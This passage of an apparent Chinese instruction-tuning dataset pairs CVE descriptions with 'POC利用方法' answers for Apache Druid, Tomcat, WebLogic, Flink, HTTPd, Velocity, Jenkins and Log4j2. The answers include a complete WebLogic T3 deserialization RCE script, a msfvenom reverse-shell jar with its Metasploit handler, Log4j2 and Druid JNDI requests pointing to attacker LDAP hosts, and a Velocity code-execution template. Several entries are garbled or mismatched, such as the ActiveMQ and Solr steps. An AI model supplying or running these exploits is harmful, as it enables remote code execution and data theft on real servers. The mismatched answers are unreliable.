Velocity模板远程执行 CVE-2019-17558.md"}
    1057. 

  1057. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid 远程代码执行漏洞 QVD-2023-9629\n漏洞描述:该漏洞源于 Apache Kafka Connect JNDI 注入漏洞(CVE-2023-25194),Apache Druid 由于支持从 Kafka 加载数据,刚好满足其利用条件,攻击者可通过修改Kafka 连接配置属性进行 JNDI 注入攻击,进而在服务端执行任意恶意代码。\n影响版本:``` Apache Druid <= 25.0.0 ```\n网络测绘:``` title=\"Apache Druid\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Apache Druid <= 25.0.0\n2. title=\"Apache Druid\"\n3. POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: your-ip\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nContent-Length: 1437\nConnection: close\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"1.1.1.1:9092\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"ldap://your-ip\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"any\",\n            \"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Druid 远程代码执行漏洞 QVD-2023-9629.md"}
    1058. 

  1058. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Mod_jk 访问控制权限绕过 CVE-2018-11759\n漏洞描述:Apache Tomcat JK(mod_jk)Connector是美国阿帕奇(Apache)软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块,用以为Apache或IIS服务器提供处理JSP/Servlet的能力。 由于httpd和Tomcat在路径处理规范上存在差异,因此可以绕过Apache mod_jk Connector 1.2.0版本到1.2.44版本上由JkMount httpd指令所定义端点的访问控制限制。 如果一个只有只读权限的jkstatus的接口可以访问的话,那么就有可能能够公开由mod_jk模块给AJP提供服务的内部路由。 如果一个具有读写权限的jkstatus接口可供访问,我们就能通过修改AJP的配置文件中相关配置来劫持或者截断所有经过mod_jk的流量,又或者进行内部的端口扫描。\n影响版本:``` Apache Mod_jk Connector 1.2.0 ~ 1.2.44 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2018-11759\n【POC利用方法】\n1. Apache Mod_jk Connector 1.2.0 ~ 1.2.44\n2. git clone https://github.com/immunIT/CVE-2018-11759.git\ndocker-conpose up -d\n3. Forbidden\nYou don't have permission to access /jkstatus on this server.\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Mod_jk 访问控制权限绕过 CVE-2018-11759.md"}
    1059. 

  1059. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938\n漏洞描述:Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 [Ghostcat(幽灵猫)](https://www.chaitin.cn/zh/ghostcat) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。\n影响版本:``` Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-1938\n【POC利用方法】\n1. Apache Tomcat 6\nApache Tomcat 7 < 7.0.100\nApache Tomcat 8 < 8.5.51\nApache Tomcat 9 < 9.0.31\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/tomcat/CVE-2020-1938\ndocker-compose up -d\n3. python CNVD-2020-10487-Tomcat-Aj\np-lfi.py -p 8009 -f /WEB-INF/web.xml xxx.xxx.xxx.xxx\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md"}
    1060. 

  1060. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr RCE 未授权上传漏洞 CVE-2020-13957\n漏洞描述:在特定的Solr版本中ConfigSet API存在未授权上传漏洞,攻击者利用漏洞可实现远程代码执行。\n影响版本:``` Apache Solr 6.6.0 -6.6.5 Apache Solr 7.0.0 -7.7.3 Apache Solr 8.0.0 -8.6.2 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-13957\n【POC利用方法】\n1. Apache Solr 6.6.0 -6.6.5\nApache Solr 7.0.0 -7.7.3\nApache Solr 8.0.0 -8.6.2\n2. cd solr-7.7.0\n./bin/solr start -e cloud -force\n3. Created collection 'gettingstarted' with 2 shard(s), 2 replica(s) with config-set 'gettingstarted'\n\nEnabling auto soft-commits with maxTime 3 secs using the Config API\n\nPOSTing request to Config API: http://localhost:8983/solr/gettingstarted/config\n{\"set-property\":{\"updateHandler.autoSoftCommit.maxTime\":\"3000\"}}\nSuccessfully set-property updateHandler.autoSoftCommit.maxTime to 3000\n\n\nSolrCloud example running, please visit: http://localhost:8983/solr\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr RCE 未授权上传漏洞 CVE-2020-13957.md"}
    1061. 

  1061. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins script 未授权远程命令执行漏洞\n漏洞描述:Jenkins 登录后访问 /script 页面,其中存在命令执行漏洞,当存在未授权的情况时导致服务器被入侵\n影响版本:``` Jenkins ```\n网络测绘:``` app=\"Jenkins\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. app=\"Jenkins\"\n2. Linux: /var/lib/jenkins/secrets/initialAdminPassword\nWindows: C:\\Users\\RabbitMask\\.jenkins\\secrets\\initialAdminPassword\n3. http://xxx.xxx.xxx.xxx/script\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Jenkins script 未授权远程命令执行漏洞.md"}
    1062. 

  1062. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WebLogic T3 反序列化漏洞 CVE-2016-3510\n漏洞描述:CVE-2016-3510漏洞是对CVE-2015-4852漏洞修复的绕过,攻击者在可以通过该漏洞实现远程命令执行。\n影响版本:``` Oracle WebLogic Server 12.2.1.0 Oracle WebLogic Server 12.1.3.0 Oracle WebLogic Server 12.1.2.0 Oracle WebLogic Server 10.3.6.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2016-3510\n【POC利用方法】\n1. Oracle WebLogic Server 12.2.1.0\nOracle WebLogic Server 12.1.3.0\nOracle WebLogic Server 12.1.2.0\nOracle WebLogic Server 10.3.6.0\n2. #!/usr/bin/env python2\n\n#Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)\n#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)\n#Made with <3 by @byt3bl33d3r\n\nfrom __future__ import print_function\nimport socket\nimport struct\nimport argparse\nimport os\nimport sys\nfrom subprocess import check_output\n\nysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']\nysoserial_path = None\n\nparser = argparse.ArgumentParser()\nparser.add_argument('target', type=str, help='Target IP:PORT')\nparser.add_argument('command', type=str, help='Command to run on target')\nparser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')\n\nif len(sys.argv) < 2:\n    parser.print_help()\n    sys.exit(1)\n\nargs = parser.parse_args()\n\nif not args.ysoserial_path:\n    for path in ysoserial_default_paths:\n        if os.path.exists(path):\n            ysoserial_path = path\nelse:\n    if os.path.exists(args.ysoserial_path):\n        ysoserial_path = args.ysoserial_path\n\nif len(args.target.split(':')) != 2:\n    print('[-] Target must be in format IP:PORT')\n    sys.exit(1)\n\nif not args.command:\n    print('[-] You must specify a command to run')\n    sys.exit(1)\n\nip, port = args.target.split(':')\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nprint('[*] Target IP: {}'.format(ip))\nprint('[*] Target PORT: {}'.format(port))\n\nsock.connect((ip, int(port)))\n\n# Send headers\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\nprint('[*] Sending header')\nsock.sendall(headers)\n\ndata = sock.recv(1024)\nprint('[*] Received: \"{}\"'.format(data))\n\npayloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])\n\npayload = '\\x00\\x00\\x09\\xf3\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\npayload += payloadObj\npayload += '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\n\n# adjust header for appropriate message length\npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\n\nprint('[*] Sending payload')\nsock.send(payload)\n3. #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md"}
    1063. 

  1063. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518\n漏洞描述:近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.\n影响版本:- Apache Flink  <= 1.9.1(最新版本)\n网络测绘:- app=\"Apache-Flink\" && country=\"CN\"\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-17518\n【POC利用方法】\n1. msfvenom -p java/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx  LPORT=4444 -f jar > test.jar\n2. msf6 > use exploit/multi/handler\n[*] Using configured payload generic/shell_reverse_tcp\nmsf6 exploit(multi/handler) > set payload java/shell/reverse_tcp\npayload => java/shell/reverse_tcp\nmsf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx\nlhost => xxx.xxx.xxx.xxx\nmsf6 exploit(multi/handler) > set lport 4444\nlport => 4444\nmsf6 exploit(multi/handler) > run\n3. import requests\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号 : PeiQi文库                                                     \\033[0m')\n    print('+  \\033[34mVersion: Apache Flink <= 1.9.1          \\033[0m')\n    print('+  \\033[36m使用格式: python3 Apache_Flink.py         \\033[0m')\n    print('+  \\033[36mUrl    >>> http://xxx.xxx.xxx.xxx:9999  \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vuln_url = target_url + \"/jars/upload\"\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\"\n    }\n    try:\n        response = requests.get(url=vuln_url, headers=headers, timeout=20)\n        if \"Unable to load requested file /jars/upload.\" in response.text:\n            print(\"\\033[32m[o] 可能存在 Apache Flink <= 1.9.1 远程代码执行漏洞\\n\\033[0m\")\n        else:\n            print(\"\\033[31m[x] 目标Url 文件上传模块无法使用\\033[0m\")\n    except:\n        print(\"\\033[31m[x] 目标Url漏洞利用失败\\033[0m\")\n\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518.md"}
    1064. 

  1064. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTPd 路径穿越漏洞 CVE-2021-41773\n漏洞描述:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件\n影响版本:``` Apache HTTPd 2.4.49~2.4.50版本 ```\n网络测绘:``` server=\"Apache/2.4.49\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-41773\n【POC利用方法】\n1. Apache HTTPd 2.4.49~2.4.50版本\n2. server=\"Apache/2.4.49\"\n3. /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache HTTPd 路径穿越漏洞 CVE-2021-41773.md"}
    1065. 

  1065. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)\n漏洞描述:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。\n影响版本:``` Apache ActiveMQ 5.13.0之前5.x版本 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2015-5254\n【POC利用方法】\n1. Apache ActiveMQ 5.13.0之前5.x版本\n2. java -version\n3. sudo apt install openjdk-8-jdk\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md"}
    1066. 

  1066. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Velocity 远程代码执行 CVE-2020-13936\n漏洞描述:Velocity Uberspector无法阻止访问java.lang.ClassLoader类加载器方法。在VelocityView的上下文中使用Velocity模板时,能够修改模版的攻击者可以使用与运行Servlet容器的帐户相同的权限执行任意Java代码或运行任意系统命令。 参考链接: - https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-13936\n【POC利用方法】\n1. ${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval(\"java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')\")}\n2. - https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity\n3. ${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval(\"java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')\")}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Velocity 远程代码执行 CVE-2020-13936.md"}
    1067. 

  1067. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins CI 远程代码执行漏洞 CVE-2017-1000353\n漏洞描述:攻击者可以将序列化的Java SignedObject对象,传输到基于远程处理的Jenkins CLI,这将最终造成反序列化,进而绕过现有基于黑名单的保护机制。Altoros Jenkins for PCF 1.0.2之前所有版本都受影响,所有用户尽快升级\n影响版本:``` Jenkins ```\n网络测绘:``` app=\"Jenkins\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-1000353\n【POC利用方法】\n1. app=\"Jenkins\"\n2. java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser \"touch /tmp/success\"\n3. https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py\npython3 jenkins.py http://xxx.xxx.xxx.xxx:8080 jenkins_poc.ser\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Jenkins CI 远程代码执行漏洞 CVE-2017-1000353.md"}
    1068. 

  1068. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Log4j2 JNDI 远程命令执行漏洞 CVE-2021-44228\n漏洞描述:Apache Log4j2是一款使用非常广泛的Java日志框架。2021年12月9日,Apache Log4j2爆出存在远程代码执行漏洞,由于Apache Log4j2广泛地应用在各种Web程序中,该漏洞涉及用户量较大,危害性非常之高,漏洞影响版本为2.0~2.14.1。\n影响版本:``` 2.0~2.14.1 使用此依赖的JAVA应用 ```\n网络测绘:``` app=\"Log4j2\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-44228\n【POC利用方法】\n1. 2.0~2.14.1\n使用此依赖的JAVA应用\n2. app=\"Log4j2\"\n3. POST /api/2.0/login HTTP/1.1\nHost:\nCookie: JSESSIONID_AV=567CEDA964EE4D5DA8B7FC8C90912B01\nContent-Length: 86\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36\nSec-Ch-Ua-Platform: \"macOS\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\ncmd: whoami\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nConnection: close\n\n{\"username\":\"${jndi:ldap://xxx.xxx.xxx.xxx:1389/Basic/TomcatEcho}\",\"password\":\"admin\"}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Log4j2 JNDI 远程命令执行漏洞 CVE-2021-44228.md"}
    1069. 

